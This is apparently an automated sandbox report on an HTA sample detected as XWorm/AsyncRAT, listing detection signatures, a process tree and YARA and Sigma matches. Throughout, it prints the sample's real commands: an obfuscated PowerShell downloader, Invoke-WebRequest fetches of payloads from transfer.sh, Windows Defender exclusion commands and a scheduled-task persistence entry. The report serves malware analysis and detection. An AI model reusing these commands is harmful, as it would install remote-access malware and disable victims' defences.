Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p5.hta

Overview

General Information

Sample name:p5.hta
Analysis ID:1392585
MD5:eb6489f441255d5bc92e640f83fca56d
SHA1:6cc24139db203cf43bb89d532733a429d5935354
SHA256:f5d43238d7de76e26d0b78baa64291caec02f09ccaa5842a23f02ab69606d366
Tags:hta
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops PE files with a suspicious file extension
Drops large PE files
Installs a global keyboard hook
Machine Learning detection for dropped file
Potentially malicious time measurement code found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7288 cmdline: mshta.exe "C:\Users\user\Desktop\p5.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7604 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • Acrobat.exe (PID: 7832 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\W2.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
          • AcroCEF.exe (PID: 8120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • AcroCEF.exe (PID: 6892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1572,i,10869719346348380041,10864435701899578402,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • powershell.exe (PID: 7868 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 8400 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • msword.com (PID: 9108 cmdline: msword.com MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F)
          • powershell.exe (PID: 8056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.com' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msword.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msword.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 8424 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 8412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msword.exe (PID: 9128 cmdline: C:\Users\user\AppData\Roaming\msword.exe MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1b991:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1ce71:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1b991:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000001E.00000002.2872402033.0000017FD2FB1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x1d785:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x20924:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1d822:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x209dc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1d937:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x20b0c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1cab5:$cnc4: POST / HTTP/1.1
0000001E.00000002.2872006726.0000017FD2EB0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x119ad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11a4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11b5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10cdd:$cnc4: POST / HTTP/1.1
Click to see the 4 entries
SourceRuleDescriptionAuthorStrings
30.2.msword.exe.17fd2fbcdd8.2.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x119ad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x14b4c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11a4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x14c04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11b5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x14d34:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10cdd:$cnc4: POST / HTTP/1.1
30.2.msword.exe.17fd2fbcdd8.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xfbad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12d4c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12e04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12f34:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xeedd:$cnc4: POST / HTTP/1.1
17.2.msword.com.217627b0000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x119ad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11a4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11b5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10cdd:$cnc4: POST / HTTP/1.1
30.2.msword.exe.17fd2eb0000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xfbad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfc4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xfd5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xeedd:$cnc4: POST / HTTP/1.1
30.2.msword.exe.17fd2eb0000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x119ad:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11a4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11b5f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10cdd:$cnc4: POST / HTTP/1.1
Click to see the 3 entries

System Summary

barindex
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGY
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: msword.com , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.com, ParentProcessId: 9108, ParentProcessName: msword.com, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', ProcessId: 8056, ProcessName: powershell.exe
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\c.bat
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: msword.com , ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.com, ParentProcessId: 9108, ParentProcessName: msword.com, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msword\msword.com', ProcessId: 8056, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\c.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf", ProcessId: 7604, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGY
